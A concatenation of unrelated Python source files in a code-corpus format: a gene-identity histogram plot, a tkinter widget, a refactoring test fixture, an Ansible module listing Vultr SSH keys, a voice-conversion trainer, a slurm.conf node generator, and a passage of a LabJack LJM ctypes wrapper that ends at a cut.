        ax.set_ylabel(r'\textit{Thermococcus onnurineus} \textsf{NA1}', fontsize=18)
        # 2D histogram of per-gene identity percentages against both subjects
        plt.hist2d(np.array(df['Thermococcus_sp._ES1_percent']),
                   np.array(df.Thermococcus_onnurineus_NA1_percent),
                   range=[[20,100], [20,100]],
                   bins=80, cmap=cm.get_cmap('Blues'))
        plt.colorbar()
        # diagonal plus 50% guide lines
        plt.plot([20,100], [20,100], color='lightgrey', linestyle='--')
        plt.plot([50,50], [20,100], color='lightgrey', linestyle='--')
        plt.plot([20,100], [50,50], color='lightgrey', linestyle='--')
        colors = ['darkorange']*2+['darkred']+['red']*6+['orange','darkgreen','darkviolet']+['black']*7
        # highlight the gene cluster (Ch5 genes 1737-1755) with labeled points
        genes = df.Thermococcus_barophilus_Ch5_gene.isin(range(1737,1756))
        genex = df['Thermococcus_sp._ES1_percent'][genes]
        geney = df.Thermococcus_onnurineus_NA1_percent[genes]
        plt.scatter(x=genex, y=geney, s=60, color=colors[::-1])
        labels = ['fdhA', '4Fe-4S',
                  'MbhH', 'MbhH\'', 'MbhH\'', 'MbhH\'\'', 'MbhM', 'Mbh(K+L)', 'MbhN',
                  'MbhJ', 'MbhX', 'FocA',
                  'MbhB', 'MbhC', 'MbhD', 'Mbh(E+F)', 'MbhG', 'MbhA', 'MbhH\'\'\'']
        for label, x, y, c, gid in zip(labels[::-1], genex, geney, colors[::-1], df.Thermococcus_barophilus_Ch5_gene[genes]):
            print gid, label, c
            plt.annotate(
                label,
                xy = (x, y), xytext = (-3, 3),
                textcoords = 'offset points', ha = 'right', va = 'bottom',
                color=c, size=14
                # bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
                # arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0')
            )
        plt.tight_layout()
        plt.savefig('test.png', dpi=100)
        plt.savefig('test.svg')
        plt.savefig('test.eps', rasterize=True)
plt.show() | 1.671875 | 2 |
v2/espacioVacio.py | Davidgh96/LP_Coloca4 | 0 | 12765071 | import tkinter
from tkinter import *
class espacioVacio(Canvas):
    """A fixed-size (150x10) empty canvas cell.

    Bug fix: the ``master`` argument was previously ignored (the canvas
    always attached to the default root window); it is now forwarded to
    ``Canvas.__init__`` so the widget is created under the intended parent.
    """

    def __init__(self, master=None):
        Canvas.__init__(self, master)
        self.configure(width=150, height=10)
python/testData/refactoring/extractmethod/OutNotEmptyStatements.after.py | jnthn/intellij-community | 2 | 12765072 | def f():
a = 10
result = 0
result = sum_squares(a, result)
print("Sum of squares: " + result)
def sum_squares(a_new, result_new):
    """Return result_new plus the squares of a_new, a_new+1, ... while < 10."""
    total = result_new
    current = a_new
    while current < 10:
        total += current * current
        current += 1
    return total
| 3.921875 | 4 |
ansible/venv/lib/python2.7/site-packages/ansible/modules/cloud/vultr/vultr_ssh_key_info.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 17 | 12765073 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, <NAME> <<EMAIL>>
# (c) 2019, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_ssh_key_info
short_description: Get information about the Vultr SSH keys available.
description:
- Get infos about SSH keys available.
version_added: "2.9"
author:
- "<NAME> (@Spredzy)"
- "<NAME> (@resmo)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Get Vultr SSH keys infos
vultr_ssh_key_info:
register: result
- name: Print the infos
debug:
var: result.vultr_ssh_key_info
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_ssh_key_info:
description: Response from Vultr API as list
returned: success
type: complex
contains:
id:
description: ID of the ssh key
returned: success
type: str
sample: 5904bc6ed9234
name:
description: Name of the ssh key
returned: success
type: str
sample: my ssh key
date_created:
description: Date the ssh key was created
returned: success
type: str
sample: "2017-08-26 12:47:48"
ssh_key:
description: SSH public key
returned: success
type: str
sample: "ssh-rsa AA... <EMAIL>"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrSSHKeyInfo(Vultr):
    """Gathers SSH key information from the Vultr v1 API."""

    def __init__(self, module):
        super(AnsibleVultrSSHKeyInfo, self).__init__(module, "vultr_ssh_key_info")
        # Maps Vultr API field names to the keys returned to Ansible:
        # 'SSHKEYID' is renamed to 'id', the remaining fields pass through
        # under their own names.
        self.returns = {
            'SSHKEYID': dict(key='id'),
            'name': dict(),
            'ssh_key': dict(),
            'date_created': dict(),
        }

    def get_sshkeys(self):
        """Return the raw API response listing all SSH keys for the account."""
        return self.api_query(path="/v1/sshkey/list")
def parse_keys_list(keys_list):
    """Convert the API's {id: key_dict} mapping into a list of key dicts.

    Args:
        keys_list: Mapping of SSH key id to key details, or None/{} when the
            account has no keys.

    Returns:
        List of key detail dicts (empty list when there are none).
    """
    if not keys_list:
        return []
    # The previous implementation iterated .items() and shadowed the builtin
    # ``id``; only the values are needed.
    return list(keys_list.values())
def main():
    """Ansible module entry point: query the SSH keys and exit with results."""
    module = AnsibleModule(
        argument_spec=vultr_argument_spec(),
        supports_check_mode=True,
    )
    info = AnsibleVultrSSHKeyInfo(module)
    keys = parse_keys_list(info.get_sshkeys())
    module.exit_json(**info.get_result(keys))
if __name__ == '__main__':
main()
| 1.648438 | 2 |
agent/trainer.py | shayanthrn/AGAIN-VC | 3 | 12765074 | import os
import torch
from tqdm import tqdm
from .base import BaseAgent
from util.mylogger import get_writer
class Trainer(BaseAgent):
    """Training agent: builds/loads a model, runs the optimization loop, and
    periodically logs, checkpoints, and evaluates on the dev set."""

    def __init__(self, config, args):
        super().__init__(config, args)
        if args.load != '':
            # Resuming: reuse the data split stored with the checkpoint.
            self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
                self.load_data(ckpt_path=args.load,
                               dataset_config=config.dataset,
                               dataloader_config=config.dataloader,
                               njobs=args.njobs)
            self.model_state, self.step_fn = self.build_model(config.build)
            self.model_state = self.load_model(self.model_state, args.load)
        else:
            # Fresh run: generate a new data split under the checkpoint dir.
            self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
                self.gen_data(ckpt_path=config.ckpt_dir, flag=config.flag,
                              dataset_config=config.dataset,
                              dataloader_config=config.dataloader,
                              njobs=args.njobs)
            self.model_state, self.step_fn = self.build_model(config.build)
        # use customed logger
        # eg. wandb, tensorboard
        self.writer = get_writer(config, args, self.ckpt_dir_flag)

    def build_model(self, build_config):
        """Build the model in training mode on this agent's device."""
        return super().build_model(build_config, mode='train', device=self.device)

    def _mel_audio_pairs(self, mels):
        """Convert a dict of mel tensors into (image, waveform) pairs.

        Mels whose frequency axis is not 80 bins are interpolated to 80 so
        the vocoder input shape is consistent. The ``/5 + 1`` rescaling is
        for visualization only. (Previously duplicated in train/evaluate.)
        """
        pairs = {}
        for name, mel in mels.items():
            if mel.shape[1] != 80:
                mel = torch.nn.functional.interpolate(mel.transpose(1, 2), 80).transpose(1, 2)
            pairs[name] = (mel.cpu().numpy() / 5 + 1, self.mel2wav(mel))
        return pairs

    # ====================================================
    # train
    # ====================================================
    def train(self, total_steps, verbose_steps, log_steps, save_steps, eval_steps):
        """Run the optimization loop until ``total_steps`` is exceeded.

        Every ``log_steps`` steps mel summaries are prepared for the logger,
        every ``verbose_steps`` the progress bar is refreshed, every
        ``save_steps`` a checkpoint is written, and every ``eval_steps`` one
        dev-set evaluation is run.
        """
        while self.model_state['steps'] <= total_steps:
            train_bar = tqdm(self.train_loader)
            for data in train_bar:
                self.model_state['steps'] += 1
                meta = self.step_fn(self.model_state, data)
                if self.model_state['steps'] % log_steps == 0:
                    if self.writer is None:
                        print('* self.writer is not implemented.')
                    else:
                        # self.writer.log(meta['log'], step=self.model_state['steps'])
                        # NOTE(review): _data is prepared but the summary call
                        # below is commented out, so it is currently unused.
                        _data = self._mel_audio_pairs(meta['mels'])
                        # self.writer.mels_summary(
                        #     tag='train/seen',
                        #     data=_data,
                        #     sample_rate=22050,
                        #     step=self.model_state['steps']
                        # )
                if self.model_state['steps'] % verbose_steps == 0:
                    meta['log']['steps'] = self.model_state['steps']
                    train_bar.set_postfix(meta['log'])
                if self.model_state['steps'] % save_steps == 0:
                    self.save_model(
                        self.model_state,
                        os.path.join(self.ckpt_dir_flag, f'steps_{self.model_state["steps"]}.pth'))
                if self.model_state['steps'] % eval_steps == 0 and self.model_state['steps'] != 0:
                    self.evaluate()

    # ====================================================
    # evaluate
    # ====================================================
    def evaluate(self):
        """Run one evaluation step on the next dev batch and log mel summaries."""
        try:
            data = next(self.dev_iter)
        except (AttributeError, StopIteration):
            # AttributeError: first call, the iterator does not exist yet.
            # StopIteration: dev loader exhausted. Either way, (re)start it.
            # (Was a bare ``except:``, which also swallowed KeyboardInterrupt.)
            self.dev_iter = iter(self.dev_loader)
            data = next(self.dev_iter)
        with torch.no_grad():
            meta = self.step_fn(self.model_state, data, train=False)
            _data = self._mel_audio_pairs(meta['mels'])
            self.writer.mels_summary(
                tag='dev/unseen',
                data=_data,
                sample_rate=22050,
                step=self.model_state['steps'])
roles/slurm/files/update_config.py | brandenm-nag/ansible | 0 | 12765075 | #! /opt/cloud_sdk/bin/python
import re
from typing import Dict, Optional
import yaml
import citc.utils
def load_yaml(filename) -> dict:
    """Parse ``filename`` as YAML and return the resulting mapping."""
    with open(filename, "r") as fp:
        return yaml.safe_load(fp)
def get_limits() -> Dict[str, Dict[str, str]]:
    """Read the per-shape service limits.

    Until OCI exposes an API for fetching service limits, they are
    maintained by hand in ``limits.yaml``.
    """
    return load_yaml("limits.yaml")
def get_shapes() -> Dict[str, Dict[str, str]]:
    """Return node shape info, preferring the provider API over the local file."""
    try:
        shapes = citc.utils.get_types_info()
    except NotImplementedError:
        # Provider has no API for this; fall back to the static file.
        shapes = load_yaml("/etc/citc/shapes.yaml")
    return shapes
def get_mgmt_info() -> Dict[str, str]:
    """Return the management node's shape/AD info, or {} if none is recorded."""
    try:
        return load_yaml("/etc/citc/mgmt_shape.yaml")
    except FileNotFoundError:
        return {}
def get_nodespace() -> Dict[str, Dict[str, str]]:
    """Return the cluster nodespace configuration (cluster_id etc.)."""
    return load_yaml("/etc/citc/startnode.yaml")
def encode_nodename(shape_name: str, node_number: int, cluster_id: str, ad: Optional[int] = None) -> str:
    """Build a Slurm node name from shape, node number and cluster/AD.

    With an availability domain: ``<shape-slug>-ad<ad>-<NNNN>``;
    without one: ``<cluster_id>-<shape-slug>-<NNNN>``.
    """
    slug = shape_name.lower().replace(".", "-")
    number = "{:0>4}".format(node_number)
    if ad is None:
        return "{}-{}-{}".format(cluster_id, slug, number)
    return "{}-ad{}-{}".format(slug, ad, number)
def create_slurmconf_line(number: int, shape_info: Dict, shape: str, cluster_id, ad: Optional[int] = None):
    """Render one ``NodeName=...`` line of slurm.conf for a cloud node."""
    nodename = encode_nodename(shape, number, cluster_id, ad)
    features = "shape={shape},ad={ad},arch={arch},pg={pg}".format(
        shape=shape,
        ad=ad,
        arch=shape_info.get("arch", "x86_64"),
        pg=shape_info.get("cluster_group", False),
    )
    template = (
        'NodeName={nodename:40} State={state:7} SocketsPerBoard={sockets:<1} '
        'CoresPerSocket={cores_per_socket:<3} ThreadsPerCore={threads_per_core:<1} '
        'RealMemory={memory:<10} Gres="{gres}" Features="{features}"'
    )
    return template.format(
        nodename=nodename,
        state="CLOUD",
        sockets=shape_info.get("sockets", 1),
        cores_per_socket=shape_info["cores_per_socket"],
        threads_per_core=shape_info.get("threads_per_core", 1),
        memory=shape_info["memory"],
        gres=shape_info.get("gres", ""),
        features=features,
    )
def get_node_configs(limits, shapes, mgmt_info, nodespace):
    """Yield one slurm.conf node line per potential cloud node.

    ``limits`` maps shape -> count, or shape -> {ad: count} for providers
    with availability domains. Shapes missing from the catalogue are
    reported and skipped; one slot is reserved for the management node in
    its own shape/AD.
    """
    cluster_id = nodespace["cluster_id"]
    for shape, counts in limits.items():
        try:
            info = shapes[shape]
        except KeyError as e:
            print("Error: Could not find shape information for {}. \nPlease log a ticket at https://github.com/clusterinthecloud/terraform/issues/new".format(e))
            continue
        if isinstance(counts, int):
            # Flat limit: provider has no availability domains.
            for idx in range(1, counts + 1):
                yield create_slurmconf_line(idx, info, shape, cluster_id)
            continue
        # Per-availability-domain limits.
        for ad, ad_count in counts.items():
            if mgmt_info and shape == mgmt_info["mgmt_shape"] and ad == mgmt_info["mgmt_ad"]:
                # One instance of this shape/AD is occupied by the mgmt node.
                ad_count -= 1
            for idx in range(1, ad_count + 1):
                yield create_slurmconf_line(idx, info, shape, cluster_id, ad)
# TODO Make sure that any nodes which are no longer managed due to service limit reductions are terminated.
slurm_conf_filename = "/mnt/shared/etc/slurm/slurm.conf"

# Render the managed-node section of slurm.conf.
node_config = "\n".join(get_node_configs(get_limits(), get_shapes(), get_mgmt_info(), get_nodespace()))

# Matches everything between the "# STARTNODES" and "# ENDNODES" markers.
chop = re.compile('(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)', re.DOTALL)

with open(slurm_conf_filename) as f:
    all_config = f.read()

# Bug fix: use a callable replacement so backslashes/"\g<...>" sequences in
# node_config are inserted literally instead of being interpreted by re.sub
# as escapes or group backreferences.
new_config = chop.sub(lambda _match: node_config, all_config)

with open(slurm_conf_filename, "w") as f:
    f.write(new_config)
| 2.328125 | 2 |
labjack/ljm/ljm.py | LihongHerman/labjack-ljm-python | 0 | 12765076 | <gh_stars>0
"""
Cross-platform wrapper for the LJM library.
"""
import ctypes
import sys
from labjack.ljm import constants
from labjack.ljm import errorcodes
class _StreamCallbackData:
    """Class containing the stream callback information."""
    def __init__(self, handle, callback):
        # User-supplied Python callback; the wrapper dereferences the ctypes
        # int pointer argument before forwarding the handle value.
        self.callbackUser = callback
        self.callbackWrapper = lambda arg: self.callbackUser(arg[0])
        # C signature: void (*)(int *). The resulting ctypes callback object
        # must stay referenced (on self) for as long as LJM may invoke it,
        # otherwise it would be garbage collected and the call would crash.
        callbackC = ctypes.CFUNCTYPE(None, ctypes.POINTER(ctypes.c_int))
        self.callbackLjm = callbackC(self.callbackWrapper)
        # The handle argument passed back to the callback; kept alive here
        # so the byref pointer remains valid.
        self.argInner = ctypes.c_int(handle)
        self.argRef = ctypes.byref(self.argInner)
class _ReconnectCallbackData:
    """Class containing the device reconnect callback information."""
    def __init__(self, handle, callback):
        # User-supplied Python callback; reconnect callbacks receive the
        # handle by value (plain int), unlike stream callbacks.
        self.callbackUser = callback
        self.callbackWrapper = lambda arg: self.callbackUser(arg)
        # C signature: void (*)(int). Keep a reference to the ctypes callback
        # object so it is not garbage collected while LJM may invoke it.
        callbackC = ctypes.CFUNCTYPE(None, ctypes.c_int)
        self.callbackLjm = callbackC(self.callbackWrapper)
        self.argInner = ctypes.c_int(handle)
# Dictionaries for maintaining callback data objects. References need to be kept
# for the callback duration, otherwise the callback data collector will delete
# them causing a segfault when LJM tries to call the callback.
_g_streamCallbackData = {}
_g_reconnectCallbackData = {}
class LJMError(Exception):
    """Custom exception class for LJM specific errors.

    Attributes:
        errorCode: The LJM error code, or None if not applicable.
        errorAddress: The Modbus address related to the error, or None.
        errorString: Human readable description of the error.
    """
    def __init__(self, errorCode=None, errorAddress=None, errorString=None):
        self._errorCode = errorCode
        self._errorAddress = errorAddress
        if errorString is None:
            self._errorString = ""
            # Best-effort lookup of the error description. Fix: was a bare
            # ``except:``, which also swallowed KeyboardInterrupt/SystemExit.
            try:
                if self._errorCode is not None:
                    self._errorString = errorToString(self._errorCode)
            except Exception:
                pass
        else:
            self._errorString = str(errorString)

    @property
    def errorCode(self):
        """The LJM error code, or None."""
        return self._errorCode

    @property
    def errorAddress(self):
        """The Modbus address related to the error, or None."""
        return self._errorAddress

    @property
    def errorString(self):
        """Human readable description of the error."""
        return self._errorString

    def __str__(self):
        addrStr = ""
        errorCodeStr = ""
        if self._errorAddress is not None:
            addrStr = "Address " + str(self._errorAddress) + ", "
        if self._errorCode is not None:
            errorCodeStr = "LJM library "
            # LJM reserves a range of codes for warnings rather than errors.
            if errorcodes.WARNINGS_BEGIN <= self._errorCode <= errorcodes.WARNINGS_END:
                errorCodeStr += "warning"
            else:
                errorCodeStr += "error"
            errorCodeStr += " code " + str(self._errorCode) + " "
        return addrStr + errorCodeStr + self._errorString
def _loadLibrary():
    """Returns a ctypes pointer to the LJM library.

    Picks the platform-specific library name, loads it with ctypes, and on
    failure prints the error and returns None so that importing this module
    does not raise.
    """
    try:
        libraryName = None
        try:
            if(sys.platform.startswith("win32") or sys.platform.startswith("cygwin")):
                # Windows
                libraryName = "LabJackM.dll"
            if(sys.platform.startswith("linux")):
                # Linux
                libraryName = "libLabJackM.so"
            if(sys.platform.startswith("darwin")):
                # Mac OS X
                libraryName = "libLabJackM.dylib"
            if libraryName is not None:
                # WinDLL (stdcall) is only appropriate for the Windows DLL;
                # everything else uses the cdecl CDLL loader.
                if libraryName == "LabJackM.dll" and sys.platform.startswith("win32"):
                    return ctypes.WinDLL(libraryName)
                else:
                    return ctypes.CDLL(libraryName)
        except Exception:
            if(sys.platform.startswith("darwin")):
                # Mac OS X load failed. Try with absolute path.
                try:
                    libraryName = "/usr/local/lib/libLabJackM.dylib"
                    return ctypes.CDLL(libraryName)
                except Exception:
                    pass
            # Re-wrap the original load failure in an LJMError.
            e = sys.exc_info()[1]
            raise LJMError(errorString="Cannot load the LJM library "+str(libraryName)+". "+str(e))
        # Unsupported operating system
        raise LJMError(errorString="Cannot load the LJM library. Unsupported platform "+sys.platform+".")
    except LJMError:
        # Report the failure but keep the module importable.
        ljme = sys.exc_info()[1]
        print(str(type(ljme)) + ": " + str(ljme))
        return None
_staticLib = _loadLibrary()
def listAll(deviceType, connectionType):
    """Scan for LabJack devices and return lists describing them.

    Args:
        deviceType: Integer device type filter (labjack.ljm.constants.dtT7,
            dtDIGIT, etc.). dtANY is allowed.
        connectionType: Integer connection type filter (ctUSB, ctTCP, etc.).
            ctANY is allowed.

    Returns:
        Tuple (numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
        aIPAddresses). aIPAddresses entries are only meaningful for
        TCP-based connections; otherwise they are
        labjack.ljm.constants.NO_IP_ADDRESS.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        This only shows what devices can be opened. To actually open one,
        use labjack.ljm.open/openS.
    """
    maxFound = constants.LIST_ALL_SIZE
    cNumFound = ctypes.c_int32(0)
    cDevTypes = (ctypes.c_int32 * maxFound)()
    cConnTypes = (ctypes.c_int32 * maxFound)()
    cSerNums = (ctypes.c_int32 * maxFound)()
    cIPAddrs = (ctypes.c_int32 * maxFound)()
    error = _staticLib.LJM_ListAll(
        ctypes.c_int32(deviceType), ctypes.c_int32(connectionType),
        ctypes.byref(cNumFound), ctypes.byref(cDevTypes),
        ctypes.byref(cConnTypes), ctypes.byref(cSerNums),
        ctypes.byref(cIPAddrs))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    found = cNumFound.value
    return (found,
            _convertCtypeArrayToList(cDevTypes[0:found]),
            _convertCtypeArrayToList(cConnTypes[0:found]),
            _convertCtypeArrayToList(cSerNums[0:found]),
            _convertCtypeArrayToList(cIPAddrs[0:found]))
def listAllS(deviceType, connectionType):
    """Scan for LabJack devices using string filters and return lists
    describing them.

    Args:
        deviceType: String device type filter ("LJM_dtT7", etc.).
            "LJM_dtANY" is allowed.
        connectionType: String connection type filter ("LJM_ctUSB",
            "LJM_ctTCP", etc.). "LJM_ctANY" is allowed.

    Returns:
        Tuple (numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
        aIPAddresses). aIPAddresses entries are only meaningful for
        TCP-based connections; otherwise they are
        labjack.ljm.constants.NO_IP_ADDRESS.

    Raises:
        TypeError: deviceType or connectionType are not strings.
        LJMError: An error was returned from the LJM library call.

    Note:
        This only shows what devices can be opened. To actually open one,
        use labjack.ljm.open/openS.
    """
    for arg in (deviceType, connectionType):
        if not isinstance(arg, str):
            raise TypeError("Expected a string instead of " + str(type(arg)) + ".")
    maxFound = constants.LIST_ALL_SIZE
    cNumFound = ctypes.c_int32(0)
    cDevTypes = (ctypes.c_int32 * maxFound)()
    cConnTypes = (ctypes.c_int32 * maxFound)()
    cSerNums = (ctypes.c_int32 * maxFound)()
    cIPAddrs = (ctypes.c_int32 * maxFound)()
    error = _staticLib.LJM_ListAllS(
        deviceType.encode("ascii"), connectionType.encode("ascii"),
        ctypes.byref(cNumFound), ctypes.byref(cDevTypes),
        ctypes.byref(cConnTypes), ctypes.byref(cSerNums),
        ctypes.byref(cIPAddrs))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    found = cNumFound.value
    return (found,
            _convertCtypeArrayToList(cDevTypes[0:found]),
            _convertCtypeArrayToList(cConnTypes[0:found]),
            _convertCtypeArrayToList(cSerNums[0:found]),
            _convertCtypeArrayToList(cIPAddrs[0:found]))
def listAllExtended(deviceType, connectionType, numAddresses, aAddresses, aNumRegs, maxNumFound):
    """Advanced listAll that additionally reads arbitrary registers from each
    device found.

    Args:
        deviceType: Integer device type filter. dtANY is allowed.
        connectionType: Integer connection type filter. ctANY is allowed.
        numAddresses: Number of addresses to query (size of aAddresses and
            aNumRegs).
        aAddresses: Addresses to query on each device found.
        aNumRegs: Register count per address; aNumRegs[i] pairs with
            aAddresses[i].
        maxNumFound: Maximum number of devices to find.

    Returns:
        Tuple (numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
        aIPAddresses, aBytes). aBytes holds the queried bytes sequentially;
        device i starts at index
        i * sum(aNumRegs) * labjack.ljm.constants.BYTES_PER_REGISTER.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        This only shows what devices can be opened. To actually open one,
        use labjack.ljm.open/openS.
    """
    regsPerDevice = sum(aNumRegs[0:numAddresses])
    bytesPerDevice = regsPerDevice * constants.BYTES_PER_REGISTER
    cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    cRegs = _convertListToCtypeArray(aNumRegs, ctypes.c_int32)
    cFound = ctypes.c_int32(0)
    cDevs = (ctypes.c_int32 * maxNumFound)()
    cConns = (ctypes.c_int32 * maxNumFound)()
    cSerials = (ctypes.c_int32 * maxNumFound)()
    cIPs = (ctypes.c_int32 * maxNumFound)()
    cData = (ctypes.c_ubyte * (maxNumFound * bytesPerDevice))()
    error = _staticLib.LJM_ListAllExtended(
        ctypes.c_int32(deviceType), ctypes.c_int32(connectionType),
        ctypes.c_int32(numAddresses), ctypes.byref(cAddrs), ctypes.byref(cRegs),
        ctypes.c_int32(maxNumFound), ctypes.byref(cFound),
        ctypes.byref(cDevs), ctypes.byref(cConns), ctypes.byref(cSerials),
        ctypes.byref(cIPs), ctypes.byref(cData))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    found = cFound.value
    return (found,
            _convertCtypeArrayToList(cDevs[0:found]),
            _convertCtypeArrayToList(cConns[0:found]),
            _convertCtypeArrayToList(cSerials[0:found]),
            _convertCtypeArrayToList(cIPs[0:found]),
            _convertCtypeArrayToList(cData[0:(found * bytesPerDevice)]))
def openS(deviceType="ANY", connectionType="ANY", identifier="ANY"):
    """Open a LabJack device using string parameters and return its handle.

    Args:
        deviceType: Device type string, optionally prefixed "LJM_dt"
            ("ANY", "T4", "T7", "DIGIT", ...).
        connectionType: Connection type string, optionally prefixed "LJM_ct"
            ("ANY", "USB", "TCP", "ETHERNET", "WIFI", ...).
        identifier: Serial number, IP address, or device name (no periods),
            or "LJM_idANY"/"ANY".

    Returns:
        The new handle representing the device connection.

    Raises:
        TypeError: deviceType or connectionType are not strings.
        LJMError: An error was returned from the LJM library call.

    Note:
        Args are not case-sensitive; empty strings mean "LJM_xxANY".
    """
    for arg in (deviceType, connectionType):
        if not isinstance(arg, str):
            raise TypeError("Expected a string instead of " + str(type(arg)) + ".")
    cHandle = ctypes.c_int32(0)
    error = _staticLib.LJM_OpenS(
        deviceType.encode("ascii"),
        connectionType.encode("ascii"),
        str(identifier).encode("ascii"),
        ctypes.byref(cHandle))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cHandle.value
def open(deviceType=constants.ctANY, connectionType=constants.ctANY, identifier="ANY"):
    """Open a LabJack device using integer constants and return its handle.

    Args:
        deviceType: Integer device type (dtT4, dtT7, dtANY, ...).
        connectionType: Integer connection type (ctUSB, ctTCP, ctANY, ...).
        identifier: Serial number, IP address, or device name (no periods),
            or "LJM_idANY"/"ANY".

    Returns:
        The new handle representing the device connection.

    Raises:
        TypeError: deviceType or connectionType are not integers.
        LJMError: An error was returned from the LJM library call.

    Note:
        Args are not case-sensitive; empty strings mean "LJM_xxANY".
    """
    cHandle = ctypes.c_int32(0)
    error = _staticLib.LJM_Open(
        ctypes.c_int32(deviceType),
        ctypes.c_int32(connectionType),
        str(identifier).encode("ascii"),
        ctypes.byref(cHandle))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cHandle.value
def getHandleInfo(handle):
    """Return the device handle's details.

    Args:
        handle: A valid handle to an open device.

    Returns:
        Tuple (deviceType, connectionType, serialNumber, ipAddress, port,
        maxBytesPerMB). ipAddress is NO_IP_ADDRESS for non-TCP connections
        and can be converted with labjack.ljm.numberToIP; port is the pipe
        for USB connections; maxBytesPerMB is the maximum packet size.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        Uses information cached at open time, so it is fast but will not
        reflect serial number or IP changes since the device was opened.
    """
    # Six c_int32 out-parameters, in the order documented above.
    cInfos = [ctypes.c_int32(0) for _ in range(6)]
    error = _staticLib.LJM_GetHandleInfo(handle, *[ctypes.byref(c) for c in cInfos])
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return tuple(c.value for c in cInfos)
def close(handle):
    """Close the connection to the device.

    Args:
        handle: A valid handle to an open device.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    error = _staticLib.LJM_Close(handle)
    if error == errorcodes.NOERROR:
        return
    raise LJMError(error)
def closeAll():
    """Close all connections to all devices.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    error = _staticLib.LJM_CloseAll()
    if error == errorcodes.NOERROR:
        return
    raise LJMError(error)
def cleanInfo(infoHandle):
    """Clean/deallocate an infoHandle.

    Args:
        infoHandle: The info handle to clean/deallocate.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        Calling cleanInfo on the same handle twice causes error
        INVALID_INFO_HANDLE.
    """
    error = _staticLib.LJM_CleanInfo(ctypes.c_int32(infoHandle))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def eWriteAddress(handle, address, dataType, value):
    """Write one value to a device register via Modbus.

    Args:
        handle: A valid handle to an open device.
        address: The address to write.
        dataType: Data type of the address (constants.FLOAT32,
            constants.INT32, etc.).
        value: The value to write.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    error = _staticLib.LJM_eWriteAddress(
        handle,
        ctypes.c_int32(address),
        ctypes.c_int32(dataType),
        ctypes.c_double(value))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def eReadAddress(handle, address, dataType):
    """Read one value from a device register via Modbus.

    Args:
        handle: A valid handle to an open device.
        address: The address to read.
        dataType: Data type of the address (constants.FLOAT32,
            constants.INT32, etc.).

    Returns:
        The read value.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cVal = ctypes.c_double(0)
    error = _staticLib.LJM_eReadAddress(
        handle, ctypes.c_int32(address), ctypes.c_int32(dataType), ctypes.byref(cVal))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
    return cVal.value
def eWriteName(handle, name, value):
    """Writes one value to a device register, addressed by name.

    Args:
        handle: A valid handle to an open device.
        name: A name (string) to write.
        value: The value to write.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    err = _staticLib.LJM_eWriteName(handle, name.encode("ascii"),
                                    ctypes.c_double(value))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def eReadName(handle, name):
    """Reads one value from a device register, addressed by name.

    Args:
        handle: A valid handle to an open device.
        name: A name (string) to read.

    Returns:
        The read value.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    readValue = ctypes.c_double(0)
    err = _staticLib.LJM_eReadName(handle, name.encode("ascii"),
                                   ctypes.byref(readValue))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return readValue.value
def eReadAddresses(handle, numFrames, aAddresses, aDataTypes):
    """Reads multiple register values from a device in one operation.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of reads to perform.
        aAddresses: List of addresses to read. This list needs to be at
            least size numFrames.
        aDataTypes: List of data types corresponding to aAddresses
            (labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
            etc.). This list needs to be at least size numFrames.

    Returns:
        A list of read values.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
